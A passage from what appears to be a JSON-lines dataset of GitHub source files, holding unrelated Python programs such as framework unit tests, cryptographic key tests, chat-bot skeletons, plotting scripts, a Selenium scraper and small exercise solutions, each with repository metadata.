TestConvNet(unittest.TestCase):\n def _test(self, run_ipu=True):\n scope = fluid.core.Scope()\n main_prog = paddle.static.Program()\n startup_prog = paddle.static.Program()\n main_prog.random_seed = SEED\n startup_prog.random_seed = SEED\n np.random.seed(SEED)\n\n np_image = np.random.rand(1, 3, 10, 10).astype(np.float32)\n\n with fluid.scope_guard(scope):\n with paddle.static.program_guard(main_prog, startup_prog):\n image = paddle.static.data(\n name='image', shape=[1, 3, 10, 10], dtype='float32')\n conv1 = paddle.static.nn.conv2d(\n image, num_filters=3, filter_size=3, bias_attr=False)\n loss = paddle.mean(conv1)\n\n sgd = paddle.optimizer.SGD(learning_rate=LR_New())\n sgd.minimize(loss)\n\n if run_ipu:\n place = paddle.IPUPlace()\n else:\n place = paddle.CPUPlace()\n exe = paddle.static.Executor(place)\n exe.run(startup_prog)\n\n if run_ipu:\n feed_list = [image.name]\n fetch_list = [loss.name]\n ipu_strategy = paddle.static.IpuStrategy()\n ipu_strategy.set_graph_config(is_training=True)\n program = paddle.static.IpuCompiledProgram(\n main_prog, ipu_strategy=ipu_strategy).compile(feed_list,\n fetch_list)\n else:\n program = main_prog\n\n result = []\n for epoch in range(100):\n if hasattr(program, \"lr_sheduler\"):\n program.lr_sheduler.step()\n loss_res = exe.run(program,\n feed={image.name: np_image},\n fetch_list=[loss])\n result.append(loss_res)\n\n return np.array(result)\n\n def test_training(self):\n # cpu and ipu dimenstion mismatch, cpu:(100, 1, 1), ipu:(100, 1)\n ipu_loss = self._test(True).flatten()\n cpu_loss = self._test(False).flatten()\n\n self.assertTrue(np.allclose(ipu_loss, cpu_loss, atol=1e-4))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"EnnSou/ooss-paddle2.3","sub_path":"python/paddle/fluid/tests/unittests/ipu/test_lr_sheduler_ipu.py","file_name":"test_lr_sheduler_ipu.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"20637627359","text":"import webcrypt.keys as wk\nimport pytest\n\nimport cryptography.hazmat.primitives.asymmetric.ec as ec\n\n_supported_curves = {\n \"secp256k1\": ec.SECP256K1(),\n \"secp256r1\": ec.SECP256R1(),\n \"secp384r1\": ec.SECP384R1(),\n \"secp521r1\": ec.SECP521R1(),\n}\n\n\n@pytest.mark.parametrize(\n \"ec_curve\",\n list(_supported_curves.values())\n)\ndef test_ec_export_import(ec_curve):\n privkey = wk.ECKey(ec_curve)\n\n # test serialization and de-serialization of an ec privkey across all supported curves\n h1 = privkey.privkey_hex()\n privkey2 = wk.ECKey.privkey_from_hex(h1, ec_curve)\n h2 = privkey2.privkey_hex()\n assert h1 == h2\n\n # test ser and de-ser of ec-pubkey across all curves, and pubkey formats\n for fmt in list(wk.ECKey.PubHexFormat):\n h1 = privkey.pubkey_hex(fmt)\n pubkey2 = wk.ECKey.pubkey_from_hex(h1, ec_curve, fmt)\n h2 = pubkey2.pubkey_hex(fmt)\n assert h1 == h2\n\n\n@pytest.mark.parametrize(\n \"ec_curve\",\n list(_supported_curves.values())\n)\ndef test_ec_sign_verify(ec_curve):\n privkey1 = wk.ECKey(ec_curve)\n\n privkey2 = wk.ECKey(ec_curve)\n\n data = b\"some data to be signed\"\n\n sig = privkey1.sign(data)\n\n assert privkey1.verify(data, sig)\n\n assert not privkey2.verify(data, sig)\n assert not privkey1.verify(data[:-1], sig)\n assert not privkey1.verify(data, sig[:1])\n\n\n@pytest.mark.parametrize(\n \"ec_curve\",\n list(_supported_curves.values())\n)\ndef test_ecdh(ec_curve):\n privkey1 = wk.ECKey(ec_curve)\n privkey2 = wk.ECKey(ec_curve)\n\n dk1 = wk.ECKey.ecdh_derive_key(privkey1.privkey, privkey2.pubkey)\n dk2 = wk.ECKey.ecdh_derive_key(privkey2.privkey, privkey1.pubkey)\n\n assert dk1 == dk2\n\n\ndef test_ed_export_import():\n privkey = wk.EDKey()\n\n h1 = privkey.privkey_hex()\n privkey2 = wk.EDKey.privkey_from_hex(h1)\n h2 = privkey2.privkey_hex()\n assert h1 == h2\n\n p1 = privkey.pubkey_hex()\n pubkey2 = wk.EDKey.pubkey_from_hex(p1)\n p2 = pubkey2.pubkey_hex()\n\n assert p1 == p2\n\n\ndef test_ed_sign_verify():\n priv1 = wk.EDKey()\n priv2 = wk.EDKey()\n\n data = b'some data that needs to be signed and verified'\n\n assert priv1.verify(data, priv1.sign(data))\n assert not priv1.verify(data, priv2.sign(data))\n assert not priv1.verify(data[:-1], priv1.sign(data))\n assert not priv1.verify(data, priv1.sign(data)[:-1])\n","repo_name":"plataux/webcrypt","sub_path":"tests/test_curves.py","file_name":"test_curves.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"70999068946","text":"\"\"\"\nformatter yeah ill riir\n\"\"\"\n\ntext = input()\n\nINDENT = 0\nSKIP = False\nfor i in text:\n if SKIP :\n SKIP = False\n continue\n print(i, end=\"\")\n if i == \"[\":\n INDENT += 4\n print()\n print(\" \"*INDENT, end=\"\")\n if i == \"]\":\n INDENT -= 4\n if i == \",\":\n print()\n print(\" \"*INDENT, end=\"\")\n SKIP = True\n\nprint()\n","repo_name":"HiddyTiddy/tost","sub_path":"format.py","file_name":"format.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40732470680","text":"n = int(input('Number: '))\n\nstart = 6 # pyrvoto perfektno 4islo\n\nwhile True:\n\tdivisors_sum = 0\n\tdivisor = 1\n\n\twhile divisor < start:\n\t\tif start % divisor == 0:\n\t\t\tdivisors_sum += divisor\n\n\t\tdivisor += 1\n\n\tif divisors_sum == start:\n\t\tprint(start)\n\t\tn = n - 1\n\n\tif n == 0:\n\t\tbreak\n\n\tstart += 1\n\n","repo_name":"AnetaStoycheva/Programming0_HackBulgaria","sub_path":"Week 2/first_n_perfect.py","file_name":"first_n_perfect.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"692452830","text":"import logging\n\nfrom aiogram import bot, Dispatcher, executor, types, Bot\n\nAPI_TOKEN = 'Your Bot token'\n\nlogging.basicConfig(level=logging.INFO)\n\nbot = Bot(token=API_TOKEN)\nab = Dispatcher(bot)\n\n@ab.message_handler(commands=['start', 'help'])\nasync def send_welcome(message: types.Message):\n\n\n await message.reply(\"Prince12_botiga XUSH KELIBSIZ! \")\n\n@ab.message_handler()\nasync def echo(message: types.Message):\n await message.answer(message.text)\n\nif __name__ == '__main__':\n executor.start_polling(ab, skip_updates=True)\n","repo_name":"Prince12Alimardon/TelegramBots","sub_path":"EXOBot.py","file_name":"EXOBot.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"73963030224","text":"import numpy as np\nimport cv2\nimport matplotlib as plt\n\nimg = cv2.imread('1.jpg')\n(h, w, d) = img.shape\nprint(\"width={}, height={}, depth={}\".format(w, h, d))\nscale_percent = 120 # percent of original size\nwidth = int(img.shape[1] * scale_percent / 100)\nheight = int(img.shape[0] * scale_percent / 100)\ndim = (width, height)\nA = cv2.resize(img, dim, interpolation = cv2.INTER_AREA)\nprint('Resized Dimensions : ',A.shape)\n \ncv2.imshow(\"Resized image\", A)\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"supert1123/Profile","sub_path":"resize.py","file_name":"resize.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16681863940","text":"import pandas as pd\ndf = pd.read_csv('gwass.csv')\nprint(df)\nimport matplotlib.pyplot as plt\nimport geneview as gv\nax = gv.manhattanplot(data=df)\nplt.show()\nax = gv.manhattanplot(data=df, xticklabel_kws={\"rotation\": \"vertical\"})\nplt.show()\nax = gv.manhattanplot(data=df,\n suggestiveline=None, # Turn off suggestiveline\n genomewideline=None, # Turn off genomewideline\n xticklabel_kws={\"rotation\": \"vertical\"})\nplt.show()\n# plot only results of chromosome 8.\ngv.manhattanplot(data=df, CHR=\"chr8\", xlabel=\"Chromosome 8\")\nplt.show()\nax = gv.manhattanplot(data=df,\n sign_marker_p=1e-6, # highline the significant SNP with ``sign_marker_color`` color.\n is_annotate_topsnp=True, # annotate the top SNP\n xticklabel_kws={\"rotation\": \"vertical\"})\nplt.show()\nimport matplotlib.pyplot as plt\nimport geneview as gv\n# common parameters for plotting\nplt_params = {\n \"font.sans-serif\": \"Arial\",\n \"legend.fontsize\": 14,\n \"axes.titlesize\": 18,\n \"axes.labelsize\": 16,\n \"xtick.labelsize\": 14,\n \"ytick.labelsize\": 14\n}\nplt.rcParams.update(plt_params)\n# Create a manhattan plot\nf, ax = plt.subplots(figsize=(12, 4), facecolor=\"w\", edgecolor=\"k\")\nxtick = set([\"chr\" + i for i in list(map(str, range(1, 10))) + [\"11\", \"13\", \"15\", \"18\", \"21\", \"X\"]])\n_ = gv.manhattanplot(data=df,\n marker=\".\",\n sign_marker_p=1e-6, # Genome wide significant p-value\n sign_marker_color=\"r\",\n snp=\"ID\", # The column name of annotation information for top SNPs.\n\n title=\"Test\",\n xtick_label_set=xtick,\n\n xlabel=\"Chromosome\",\n ylabel=r\"$-log_{10}{(P)}$\",\n\n sign_line_cols=[\"#D62728\", \"#2CA02C\"],\n hline_kws={\"linestyle\": \"--\", \"lw\": 1.3},\n\n is_annotate_topsnp=True,\n ld_block_size=50000, # 50000 bp\n text_kws={\"fontsize\": 12,\n \"arrowprops\": dict(arrowstyle=\"-\", color=\"k\", alpha=0.6)},\n ax=ax)\nplt.show()\nax = gv.qqplot(data=df[\"P\"])\nplt.show()\n#Show a better QQ plot\nf, ax = plt.subplots(figsize=(6, 6), facecolor=\"w\", edgecolor=\"k\")\n_ = gv.qqplot(data=df[\"P\"],\n marker=\"o\",\n title=\"Test\",\n xlabel=r\"Expected $-log_{10}{(P)}$\",\n ylabel=r\"Observed $-log_{10}{(P)}$\",\n ax=ax)\nplt.show()\n#Admixture plot\nimport matplotlib.pyplot as plt\nfrom geneview.utils import load_dataset\nfrom geneview import admixtureplot\nf, ax = plt.subplots(1, 1, figsize=(14, 2), facecolor=\"w\", constrained_layout=True, dpi=300)\nadmixtureplot(data=load_dataset(\"admixture_output.Q\"),\n population_info=load_dataset(\"admixture_population.info\"),\n ylabel_kws={\"rotation\": 45, \"ha\": \"right\"},\n ax=ax)\nplt.show()\n","repo_name":"Aria-Dolatabadian/GWAS","sub_path":"Code.py","file_name":"Code.py","file_ext":"py","file_size_in_byte":2980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37445648589","text":"#!/usr/bin/python3\n\n# The Las Pegasus Radio (https://github.com/tlpr)\n# This code is licensed under the GNU GPL-3.0-only license\n# https://www.gnu.org/licenses/gpl-3.0.html\n\nimport discord, asyncio, configparser\nfrom datetime import datetime\n\nclass miami_disco (discord.Client):\n\t\n\tdef console_out_debug(self, message, highlight=False):\n\t\tprefix = \"\\033[33m\\033[1m[Discord]\\033[0m \"\n\t\tif (highlight):\n\t\t\tprint(\"\\n\" + prefix + message, end=\"\\n\\n\")\n\t\telse:\n\t\t\tprint(prefix + message)\n\t\n\tdef reload_configuration_ini(self):\n\t\tconfig_parser = configparser.ConfigParser()\n\t\tconfig_parser.read(\"configuration.ini\")\n\t\tself.configini = config_parser\n\t\n\tdef start_disco(self):\n\t\ttry:\n\t\t\tself.run(self.configini[\"BOT\"][\"DITOKEN\"])\n\t\texcept discord.errors.LoginFailure:\n\t\t\tself.console_out_debug(\"Incorrect DITOKEN.\", True)\n\t\n\tasync def on_ready(self):\n\t\tself.console_out_debug(\"Logged in.\")\n\n\tasync def on_message(self, message, edited=False):\n\t\tpass\n\n\tasync def on_message_edit(self, old_message, new_message):\n\t\tif old_message.pinned: return # ignore pinned messages\n\t\tif (datetime.timestamp(old_message.created_at) + 3600) < datetime.timestamp(new_message.edited_at):\n\t\t\treturn # do not send edited message if the original message\n\t\t\t # is older than a hour.\n\t\tawait self.on_message(new_message, edited=True)\n\n","repo_name":"tlpr/miami","sub_path":"src/disco.py","file_name":"disco.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"2762652683","text":"#!/usr/bin/env python3\n\n# DSNY_Frequencies.csv comes from https://data.cityofnewyork.us/City-Government/DSNY-Frequencies/rv63-53db/\n\nimport csv, json, sys\ncsv.field_size_limit(sys.maxsize)\n\ndata = {\n \"type\": \"FeatureCollection\", \n \"crs\": {\n \"type\": \"name\", \n \"properties\": {\n \"name\": \"urn: ogc:def:crs:OGC:1.3:CRS84\"\n }\n }, \n \"features\": []\n}\n\nwith open('./DSNY_Frequencies.csv', 'r') as csvfile:\n for row in [dict(row) for row in csv.DictReader(csvfile)]:\n # round to 5 decimals, error is about 3ft -- https://en.wikipedia.org/wiki/Decimal_degrees\n # remove '\"MULTIPOLYGON (((' clutter from source csv to be just coordinates\n tmp_a = [e.lstrip().split(' ') for e in row[\"multipolygon\"].split('(')[3].split(')')[0].split(',')]\n # convert to floats to trim to 5 decimals, then stringify\n tmp_b = [json.dumps([float('%.5f'%float(y[0])), float('%.5f'%float(y[1]))]) for y in tmp_a ]\n # remove duplicates while preserving order,\n tmp_set = set()\n tmp_c = []\n for x in tmp_b:\n if x not in tmp_set:\n tmp_set.add(x)\n tmp_c.append(x)\n\n # convert json arrays back to lists of floats\n tmp_d = [json.loads(x) for x in tmp_c] \n\n data['features'].append({\n \"type\": \"Feature\",\n \"properties\": {\n \"bulk\": row[\"FREQ_BULK\"].split(\", \"), \n \"recycling\": row[\"FREQ_RECYCLING\"].split(\", \"), \n \"refuse\": row[\"FREQ_REFUSE\"].split(\", \"), \n },\n \"geometry\": {\n \"type\": \"Polygon\",\n \"coordinates\": [tmp_d]\n }\n })\n\nwith open('data.json', 'w') as f:\n json.dump(data, f)\n","repo_name":"mai-gh/dsny-freq-map","sub_path":"gen_json.py","file_name":"gen_json.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26681656489","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nfrom functools import reduce\nfrom typing import List, Tuple, Generator\n\n\ndef main(lines: List[str]):\n cols: int = len(lines[0])\n rows: int = len(lines)\n energy_map: List[int] = [\n *map(lambda s: int(s), reduce(lambda acc, curr: str(acc) + curr, lines, \"\"))]\n\n print(\"=== [ part one ] ============================\")\n print(\"|| how many octo flashes after 100 steps? ||\")\n\n step = 0\n for flashes, _ in octo_party(energy_map.copy(), rows, cols, 100):\n step += 1\n\n print(f\"After step {step}: {flashes} flashes\")\n\n print()\n print(\"=== [ part two ] ============================\")\n print(\"|| how long until complete synchronization? ||\")\n step = 0\n for flashes, energy_map in octo_party(energy_map.copy(), rows, cols, 10000):\n step += 1\n if energy_map.count(energy_map[0]) == len(energy_map):\n break\n\n print(f\"1st total synchronization reached after {step} steps: {flashes} flashes\")\n\n\ndef octo_party(energy_map: List[int], rows: int, cols: int, steps: int) -> Generator[Tuple[int, List[int]], None, None]:\n \"\"\"\n octo_party simulates totally cute bioluminescent dumbo octopuses\n that are arrange in a given energy_map with dimension (rows, cols)\n for n given steps. Acting as a generator on every step, it returns\n the current energy level of every octocutie along with the number of flashes.\n \"\"\"\n octopusses: int = len(energy_map)\n\n flashes: int = 0\n for step in range(steps):\n for octopus in range(octopusses):\n energy_map[octopus] += 1\n\n # handle flashes\n flashing: List[int] = [*filter(lambda octopus: energy_map[octopus] > 9, range(octopusses))]\n for idx in flashing:\n energy_map[idx] = 0 # reset the cutie\n flashes += 1\n\n for neighbor in get_n8_neighborhood(idx, rows, cols):\n if neighbor in flashing:\n continue\n\n energy_map[neighbor] += 1\n if energy_map[neighbor] > 9:\n flashing.append(neighbor)\n\n yield flashes, energy_map\n\n\ndef within_limit(x: int, n: int) -> int:\n return 0 if x < 0 else n - 1 if x >= n else x\n\n\ndef get_n8_neighborhood(pos: int, rows: int, cols: int) -> List[int]:\n row: int = pos // cols\n col: int = pos % cols\n\n neighbors: List[Tuple[int, int]] = [\n (within_limit(row - 1, rows), within_limit(col, cols)),\n (within_limit(row - 1, rows), within_limit(col + 1, cols)),\n (within_limit(row, rows), within_limit(col + 1, cols)),\n (within_limit(row + 1, rows), within_limit(col + 1, cols)),\n (within_limit(row + 1, rows), within_limit(col, cols)),\n (within_limit(row + 1, rows), within_limit(col - 1, cols)),\n (within_limit(row, rows), within_limit(col - 1, cols)),\n (within_limit(row - 1, rows), within_limit(col - 1, cols)),\n ]\n\n # translate back from xy to sequential number\n translated: List[int] = [*map(lambda neighbor: neighbor[0] * cols + neighbor[1], neighbors)]\n return list(set([*filter(lambda neighbor: neighbor != pos, translated)]))\n\n\nif __name__ == \"__main__\":\n path: str = sys.argv[1] if len(sys.argv) > 1 else \"\"\n if not os.path.exists(path):\n print(f\"given path {path} does not exist\")\n sys.exit(1)\n\n with open(path) as fh:\n lines: List[str] = [*map(lambda line: line.strip(),\n filter(lambda line: line != \"\", fh.readlines()))]\n if len(lines) == 0:\n print(\"no lines detected\")\n sys.exit(1)\n\n main(lines)\n","repo_name":"rathalos64/adventofcode","sub_path":"_11/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35284120468","text":"# Analyses.py\n# \n# ---------------------------------------------------------------------- \n# Imports\n# ---------------------------------------------------------------------- \nimport SUAVE\nfrom SUAVE.Core import Units \nimport sys \nsys.path.append('../../XX_Supplementary/Aircraft_Models_and_Simulations') \nfrom Stopped_Rotor import base_analysis \n\n# ----------------------------------------------------------------------\n# Define the Vehicle Analyses\n# ---------------------------------------------------------------------- \ndef analyses_setup(configs): \n \n aircraft_range = 70 *Units.nmi \n N_gm_x = 10\n N_gm_y = 5 \n run_noise_model = False\n hover_noise_test = False \n \n min_x = 0\n max_x = 1\n min_y = 0\n max_y = 1\n \n analyses = SUAVE.Analyses.Analysis.Container()\n\n # build a base analysis for each config\n for tag,config in configs.items():\n analysis = base_analysis(config,N_gm_x,N_gm_y,min_y,max_y,min_x,max_x,\n aircraft_range,run_noise_model,hover_noise_test)\n analyses[tag] = analysis\n\n return analyses\n\n ","repo_name":"mclarke2/STANFORD_THESIS","sub_path":"07_MDA_Trade_Studies/07_Battery_Config_Optimization/SR_Battery_Optimization/Battery_Opt_Analyses.py","file_name":"Battery_Opt_Analyses.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7227791837","text":"import time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver import Keys\r\nfrom selenium.webdriver.chrome.service import Service\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.select import Select\r\nfrom webdriver_manager.chrome import ChromeDriverManager\r\n\r\ndriver = webdriver.Chrome(service=Service(ChromeDriverManager().install()))\r\n# driver = webdriver.Chrome(executable_path=ChromeDriverManager().install())\r\ndriver.get(\"https://www.yatra.com/\")\r\ndriver.maximize_window()\r\ntime.sleep(2)\r\n\r\ndepart_city = \"Dallas Fort Worth\"\r\n\r\n# city = 'Udhagamandalam'\r\n# search_field = driver.find_element(By.ID, \"input-auto-complete\")\r\n\r\ndepart = driver.find_element(By.ID, \"BE_flight_origin_city\")\r\ndepart.click()\r\ntime.sleep(2)\r\n\r\nfor x in depart_city:\r\n depart.send_keys(x)\r\ndepart.send_keys(Keys.ENTER)\r\n\r\ntime.sleep(4)\r\n\r\narrival_city = \"Dubai\"\r\narrival = driver.find_element(By.ID, \"BE_flight_arrival_city\")\r\narrival.click()\r\n\r\ntime.sleep(1)\r\n\r\nfor x in arrival_city:\r\n arrival.send_keys(x)\r\narrival.send_keys(Keys.ENTER)\r\ntime.sleep(2)\r\n\r\ndriver.find_element(By.ID, 'BE_flight_origin_date').click()\r\n\r\ntime.sleep(2)\r\n\r\n# //div[@class=\"day-container\"]//child::td\r\n\r\n# //*[@class=\"datepicker flex1 activeBox\"]//child::td\r\ndepart_date='09/02/2022'\r\ncalendar_dates = driver.find_elements(By.XPATH, '//*[@class=\"day-container\"]//child::td')\r\n#print(len(calendar_dates))\r\n\r\nfor date in calendar_dates:\r\n if(date.get_attribute(\"data-date\") == depart_date):\r\n print(\"Correct date\",\"&&&&&&\")\r\n date.click()\r\n break\r\n\r\ntime.sleep(4)\r\n\r\n\r\n\r\ndriver.find_element(By.ID,\"BE_flight_flsearch_btn\").click()\r\ntime.sleep(3)\r\n#book_now=driver.find_elements(By.XPATH,'//*[@class=\"fs-14 secondary-button button cursor-pointer bold\"]')\r\nbook_now=driver.find_elements(By.XPATH,\"//*[@class='full mb-8 fs-13 airline-name']\")\r\n\r\n\r\n\r\nprint(len(book_now))\r\nfor flight in book_now:\r\n print(flight.text)\r\ntime.sleep(4)\r\n\r\n\r\n","repo_name":"divyabaijuraj/test","sub_path":"Day2/Exercise7.py","file_name":"Exercise7.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29675405974","text":"\"\"\"\n1、MyList类\n1)初始化方法\n2)__iter__()方法,对外提供迭代器\n3)additem()方法,用来添加数据\n\n2、自定义迭代器,MyListIterator类\n1)初始化方法\n2)迭代器方法 __iter__()\n3) 获取下一个数据方法,next()\n\n目标:\nmylist = MyList()\nfor value in mylist:\n print(value)\n\n\n\n\"\"\"\n\n\n# 1、MyList类\nclass MyList(object):\n # 1)初始化方法\n def __init__(self):\n # 定义实例属性,保存数据\n self.items = []\n\n # 2)__iter__()方法,对外提供迭代器\n def __iter__(self):\n # 实例化MyListIterator()\n mylist_iterator = MyListIterator(self.items)\n # 返回迭代器\n return mylist_iterator\n\n # 3)additem()方法,用来添加数据\n def additem(self, data):\n # 追加保存内容\n self.items.append(data)\n print(self.items)\n\n\n# 2、自定义迭代器,MyListIterator类\nclass MyListIterator(object):\n # 1)初始化方法\n def __init__(self, items):\n # 定义实例属性,保存MyList()传递过来的items\n self.itmes = items\n\n # 记录迭代器迭代的位置\n self.current_index = 0\n\n # 2)迭代器方法 __iter__()\n def __iter__(self):\n pass\n\n # 3) 获取下一个数据方法,next()\n # 当next()时候,就会自动调用 __next__()方法\n def __next__(self):\n # 1、判断当前的下标是否越界\n if self.current_index < len(self.itmes):\n # 1)根据下标获取当前下标的元素值\n data = self.itmes[self.current_index]\n # 2)下标位置+1\n self.current_index += 1\n # 3)返回下标对应的数据\n return data\n\n # 2、如果越界,直接抛出异常\n else:\n # raise 主动抛出异常\n # StopIteration 停止迭代\n raise StopIteration\n\n\nif __name__ == '__main__':\n # 创建自定义列表对象\n mylist = MyList()\n mylist.additem(\"小明\")\n mylist.additem(\"小红\")\n mylist.additem(\"猪八戒\")\n mylist.additem(\"xxxxxxxxx\")\n\n # 遍历的本质\n # 1、iter(mylist)获取mylist对象的迭代器 --> MyList() --> __iter__()\n # 2、next(迭代器)获取下一个值\n # 3、捕获异常\n # for value in mylist:\n # print(\"name: \", value)\n\n mylist_iterator = iter(mylist)\n value = next(mylist_iterator)\n print(value)\n\n value = next(mylist_iterator)\n print(value)\n\n value = next(mylist_iterator)\n print(value)\n\n value = next(mylist_iterator)\n print(value)\n\n # value = next(mylist_iterator)\n # print(value)\n","repo_name":"18025574067/python-20","sub_path":"day08/02-自定义列表.py","file_name":"02-自定义列表.py","file_ext":"py","file_size_in_byte":2659,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19837217861","text":"from sqlalchemy import Column, Integer, String\nfrom sqlalchemy.orm import relationship\nfrom app.src.models.BaseModel import BaseModel\n\nbase = BaseModel()\nBase = base.getDeclarative()\n\n\nclass TrainingUrlModel(Base):\n __tablename__ = \"training_url\"\n\n id = Column(\n Integer,\n primary_key=True,\n nullable=False\n )\n name = Column(\n String(1),\n nullable=False\n )\n\n url = Column(\n String(100),\n nullable=False\n )\n\n description = Column(\n String(1000),\n nullable=False\n )\n\n priority = Column(\n Integer,\n nullable=False\n )\n\n trainings = relationship(\"TrainingModel\", back_populates=\"trainingUrl\")\n","repo_name":"TheGeniesis/PAK","sub_path":"app/src/models/TrainingUrlModel.py","file_name":"TrainingUrlModel.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7718143863","text":"import json, csv\n\ndef load_samples_from_json(file_name):\n # Essa função lê os 284 \"esquemas\" ou \"amostras\" do .json e coloca em samples\n with open(file_name, 'r', encoding='utf-8') as file:\n samples = json.load(file)\n return samples\n\ndef create_json(file_name, translated_samples):\n # Essa função cria o arquivo .json traduzido pro inglês\n with open(file_name, 'w', encoding='utf-8') as output_file:\n json.dump(translated_samples, output_file, ensure_ascii=False)\n\ndef create_csv(file_name, translated_samples):\n # Essa função cria o arquivo .csv de esquemas traduzido pro inglês\n with open(file_name, 'w', encoding='utf-8', newline='') as output_file:\n writer = csv.writer(output_file, delimiter=',')\n writer.writerow(translated_samples)\n\n\nsamples = load_samples_from_json('english_wsc.json')\n\nonly_schema_samples = []\ni = 0\nfor sample in samples:\n i = i+1\n only_schema_samples.append(sample['schema'])\n\ncreate_csv('english_wsc_only_schemas.csv', only_schema_samples)\ncreate_json('english_wsc_only_schemas.json', only_schema_samples)","repo_name":"thaapontes/tcc_project","sub_path":"english_schemas.py","file_name":"english_schemas.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14987505570","text":"import decimal\nrepo = {100: [\"bread\", 2], 101: [\"bakery products\", 3], 102: [\"cookie\", 5], #{category: [product, price]}\n 200: [\"pork\", 9.99], 201: [\"beaf\", 15], 202: [\"chicken\", 7],\n 300: [\"hake fish\", 15], 301: [\"cod\", 25], 302: [\"shrimps\", 35]}\n\nshoping_cart_final = {}\ntotal_price = 0\n\ndef get_bakery():\n bakery_repo = {}\n bakery_repo.update([v for k,v in repo.items() if k in range(100,199,1)])\n return bakery_repo.items() \n\ndef get_meat():\n meat_repo = {}\n meat_repo.update([v for k,v in repo.items() if k in range(200,299,1)])\n return meat_repo.items()\n\ndef get_fish():\n fish_repo = {}\n fish_repo.update([v for k,v in repo.items() if k in range(300,399,1)])\n return fish_repo.items() \n\ndef add_to_cart(product, quantity):\n for v in repo.values():\n if product == v[0]:\n price = round(decimal.Decimal(quantity*v[1]),2)\n global total_price\n total_price = round(decimal.Decimal(total_price + price),2)\n cost = [v[1], quantity, price]\n shoping_cart= dict.fromkeys([v[0]], cost)\n shoping_cart_final.update(shoping_cart)\n return True\n else:\n return False\n\ndef remove_cart(product, quantity):\n for k, v in shoping_cart_final.items():\n if (product == k and quantity == v[1]):\n global total_price\n total_price = round((total_price - decimal.Decimal(quantity*v[0])),2)\n shoping_cart_final.pop(k)\n return True\n elif (product == k and quantity < v[1]):\n price = round(decimal.Decimal(v[2]) - decimal.Decimal(quantity*v[0]),2)\n cost = [v[0], v[1] - quantity, price]\n total_price = round((decimal.Decimal(total_price) - decimal.Decimal(quantity*v[0])),2)\n edit_cart= dict.fromkeys([k], cost)\n shoping_cart_final.update(edit_cart)\n return True\n return False \n\ndef confirm_order():\n global total_price\n total_price = 0\n shoping_cart_final.clear()\n return \"Order accepted for work\" \n\n \n \n\n\n","repo_name":"MikitaTsiarentsyeu/Md-PT1-50-22","sub_path":"Tasks/Churo/Task_6/shop_data.py","file_name":"shop_data.py","file_ext":"py","file_size_in_byte":2098,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"1611313857","text":"class Solution:\n def findRepeatedDnaSequences(self, s: str) -> List[str]:\n \n # Linear-time Slice Using Substring + HashSet\n # much fast look up in set vs. in list\n # time & space, O((n-l)*l), n the loop executed N - L + 1 one builds a substring of length L. \n \n # rabin-karp for multiple pattern search\n # Constant-time Slice Using Rolling Hash\n l, n = 10, len(s)\n seen, ans = set(), set()\n \n for start in range(n - l + 1):\n tmp = s[start : start + l]\n if tmp in seen:\n ans.add(tmp[:])\n seen.add(tmp)\n return ans ","repo_name":"cindyyj/leetcode_solutions","sub_path":"187-repeated-dna-sequences/187-repeated-dna-sequences.py","file_name":"187-repeated-dna-sequences.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33303317449","text":"import json\nimport logging\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport skfuzzy as fuzz\nimport sys\nfrom cerberus import Validator\nfrom types import SimpleNamespace\n\nCONFIG_FILE = \"./resources/config/config.json\"\nANTE_CONFIG_FILE = \"./resources/config/antecedent_config.json\"\nCONFIG_VALIDATION = \"./../resources/validation/config_schema.json\"\n\n__config = None\n__ante_config = None\n\n\ndef get_config(config_file=CONFIG_FILE, reload=False):\n \"\"\"\n @param config_file: config file path (default: \"./resources/config/config.json\")\n @param reload: whether or not to reload config file (default: False)\n\n @returns config as namespace\n \"\"\"\n global __config\n config_file = config_file if config_file is not None else CONFIG_FILE\n if __config is None or config_file != CONFIG_FILE or reload:\n with open(config_file) as f:\n __config = json.load(f, object_hook=lambda 